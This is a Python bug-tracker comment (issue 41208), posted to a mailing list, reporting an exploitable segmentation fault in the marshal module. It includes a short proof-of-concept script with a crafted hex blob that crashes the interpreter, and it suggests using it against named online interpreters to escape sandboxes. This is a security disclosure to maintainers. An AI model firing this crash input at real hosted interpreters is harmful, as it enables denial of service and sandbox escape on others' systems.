[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin
report at bugs.python.org
Sun Jul 12 10:45:23 EDT 2020
Iman Sharafodin <iman.sharafodin at gmail.com> added the comment:
There are many online Python interpreters, we can use this malicious file to escape their sandboxes and get control of their Docker container or system (and abuse them, for example, to conduct a DoS attack), as their fully trust that Python doesn't generate segfault.
For example, the following code clearly kills the interpreter (and a shellcode can be attached), even though, they have protection mechanisms for file access and many other things.
-----------
https://www.programiz.com/python-programming/online-compiler/
-----------
import io
import marshal
hex_string = "FBE901000000DA0136E90209000072010000007203000000DA0168A90372010000007205000000DA026161DA026A6A7BDA0278785B020000007201000000DA01353030DA0170E7E10B930189E4414130"
myb = bytes.fromhex(hex_string)
f = io.BytesIO(myb)
print(f)
data = marshal.load(f)
print(data)
print('We have segfault but we cannot see!')
-------------------
----------
_______________________________________
Python tracker <report at bugs.python.org>
<https://bugs.python.org/issue41208>
_______________________________________
More information about the Python-bugs-list
mailing list